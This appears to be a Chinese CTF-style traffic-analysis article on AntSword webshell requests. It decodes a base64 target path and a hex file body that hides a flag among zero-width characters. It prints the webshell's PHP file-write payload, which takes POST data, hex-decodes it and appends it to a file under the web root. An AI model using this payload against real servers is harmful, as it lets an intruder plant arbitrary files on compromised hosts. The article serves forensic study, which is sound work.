bbb651ffd32e89=E2808CE2808CE2808CE2808CE2808DEFBBBFE280ACEFBBBFE2808DE280ACE2808CE2808CE2808DE280ACEFBBBFE2808DE2808DE2808DE2808DE2808DE280ACE2808DEFBBBFE2808CE2808DE2808CEFBBBFEFBBBFE2808DE280ACE2808CE2808CE2808DE2808DE2808CE280ACE280ACE2808DEFBBBFEFBBBFE2808DE2808DEFBBBFEFBBBFE280ACEFBBBFE2808DEFBBBF6E796E75637466E2808DE2808DE2808DEFBBBFE2808CE2808CE2808DE280ACE2808DE280ACEFBBBFE280ACEFBBBFE280ACE2808CE2808DE2808DE2808DE2808CEFBBBFEFBBBFE2808DE2808DE280AC7BE4BD9BE69BB0E2808DE2808DEFBBBFEFBBBFE280ACE2808DE2808DEFBBBFEFBC9AE2808CE2808CE2808CE2808CE2808DE280ACE2808DE280ACE2808CE2808CE2808CE2808CE2808DE280ACEFBBBFE2808CE5AEA4E6A2B5E999A4E79AA4E68289E5A5A2E68190E7BDB0E68980E4BE84E4BBA5E680AFE683B3E58092E586A5E9978DE59386E9BABCE8A8B6E586A5E68096E699BAE69BB0E5A4A2E8ABB3E5AEA4E88FA9E591BCE59190E5A4A2E784A1E4BFB1E4B896E586A5E69BB0E8A8B6E7A9B6E591BCE59190E8A8B6E6BB85E5A5A2E4BCBDE5A5A2E7BE85E7BCBDE8A8B6E79AA4E88BA6E5B89DE99B86E680AFE6AEBFE59190E699BAE986AFE4BE84E58092E59190E58DB3E58887E4BE9DE7BCBDE68096E58DB3E9809DE5A5A2E58092E79AA4E880B6E695B8E4BE84E4BE9DE5A4B7E2808CE2808CE2808CE2808CE2808DE280ACE2808CE2808DE2808CE2808CE2808CE2808CE2808DE280ACE2808DEFBBBFE2808CE2808CE2808CE2808CE2808DEFBBBFEFBBBFE2808D7D
yeedbdd3ffe99=KyL3Zhci93d3cvaHRtbC91cGxvYWQvZmlsZS50eHQ=
参数 yeedbdd3ffe99:截去前两个字符后 base64 解码,得到要写入的文件路径
yeedbdd3ffe99=KyL3Zhci93d3cvaHRtbC91cGxvYWQvZmlsZS50eHQ=
/var/www/html/upload/file.txt
参数 bbb651ffd32e89
str_replace:str_replace() 函数替换字符串中的一些字符(区分大小写)。
// Raw content parameter: a hex string (see the #$c line below).
$c=$_POST["bbb651ffd32e89"];
// As rendered these strip the letters r and n; presumably "\r"/"\n" with the
// backslash lost in rendering - either way a pure-hex value is unchanged.
$c=str_replace("r","",$c);
$c=str_replace("n","",$c);
#$c=E2808CE2808CE2808CE2808CE2808DEFBBBFE280ACEFBBBFE2808DE280ACE2808CE2808CE2808DE280ACEFBBBFE2808DE2808DE2808DE2808DE2808DE280ACE2808DEFBBBFE2808CE2808DE2808CEFBBBFEFBBBFE2808DE280ACE2808CE2808CE2808DE2808DE2808CE280ACE280ACE2808DEFBBBFEFBBBFE2808DE2808DEFBBBFEFBBBFE280ACEFBBBFE2808DEFBBBF6E796E75637466E2808DE2808DE2808DEFBBBFE2808CE2808CE2808DE280ACE2808DE280ACEFBBBFE280ACEFBBBFE280ACE2808CE2808DE2808DE2808DE2808CEFBBBFEFBBBFE2808DE2808DE280AC7BE4BD9BE69BB0E2808DE2808DEFBBBFEFBBBFE280ACE2808DE2808DEFBBBFEFBC9AE2808CE2808CE2808CE2808CE2808DE280ACE2808DE280ACE2808CE2808CE2808CE2808CE2808DE280ACEFBBBFE2808CE5AEA4E6A2B5E999A4E79AA4E68289E5A5A2E68190E7BDB0E68980E4BE84E4BBA5E680AFE683B3E58092E586A5E9978DE59386E9BABCE8A8B6E586A5E68096E699BAE69BB0E5A4A2E8ABB3E5AEA4E88FA9E591BCE59190E5A4A2E784A1E4BFB1E4B896E586A5E69BB0E8A8B6E7A9B6E591BCE59190E8A8B6E6BB85E5A5A2E4BCBDE5A5A2E7BE85E7BCBDE8A8B6E79AA4E88BA6E5B89DE99B86E680AFE6AEBFE59190E699BAE986AFE4BE84E58092E59190E58DB3E58887E4BE9DE7BCBDE68096E58DB3E9809DE5A5A2E58092E79AA4E880B6E695B8E4BE84E4BE9DE5A4B7E2808CE2808CE2808CE2808CE2808DE280ACE2808CE2808DE2808CE2808CE2808CE2808CE2808DE280ACE2808DEFBBBFE2808CE2808CE2808CE2808CE2808DEFBBBFEFBBBFE2808D7D
// Hex -> bytes, two characters at a time, via urldecode("%XX").
$buf="";
for ($i=0;$i<strlen($c);$i+=2)
$buf.=urldecode("%".substr($c,$i,2));
# $buf 为文件内容,
# $f=/var/www/html/upload/file.txt
// Append the decoded bytes to $f; the response is a bare "1" or "0".
echo(@fwrite(fopen($f,"a"),$buf)?"1":"0");
原文始发于微信公众号(0xh4ck3r):蚁剑流量分析